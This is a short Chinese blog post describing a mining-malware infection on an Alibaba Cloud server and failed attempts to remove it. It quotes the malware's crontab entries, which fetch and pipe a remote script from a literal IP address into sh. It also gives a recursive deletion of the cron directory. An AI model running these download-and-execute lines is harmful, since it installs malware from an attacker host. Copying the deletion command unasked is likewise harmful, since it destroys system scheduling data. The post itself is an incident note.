背景
伺服器好久不登入,近期登陸時發現特別卡,於是使用 top 命令檢視程式資訊,發現有一個程式佔用了 90% 以上的 CPU 資源,則登陸阿里雲伺服器發現漏洞警告,發現這個程式是在挖礦。
講解
通常這種挖礦病毒,簡單的 kill 和把程式的所在資料夾刪除掉都不能起到斬草除根的效果,因這種病毒都會在伺服器中建立一個定時指令碼,每一段時間會檢測病毒指令碼是否被殺死了,如果殺死了並且可執行檔案也被刪除了,那麼它就會自動下載源程式並且啟動執行指令碼。所以解決問題根本所在就是將定時任務刪除掉,在將該程式殺掉才能起到效果。
解決
一、使用 cat /var/spool/cron/crontabs/root 檢視定時任務內容
cat /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh可以看出來它有兩個任務,刪除 /var/spool/cron 下的內容
rm -fr /var/spool/cron/二、刪除程式和執行指令碼
執行指令碼路徑使用 ps 命令來檢視
[root@izbp11bmmclnlx35st0s3rz ~]# ps 31688
PID TTY STAT TIME COMMAND
31688 ? Ssl 11:07 /tmp/Macron最後還是沒有解決,和阿里雲溝通結果:建議您重灌系統呢。
本作品採用《CC 協議》,轉載必須註明作者和本文連結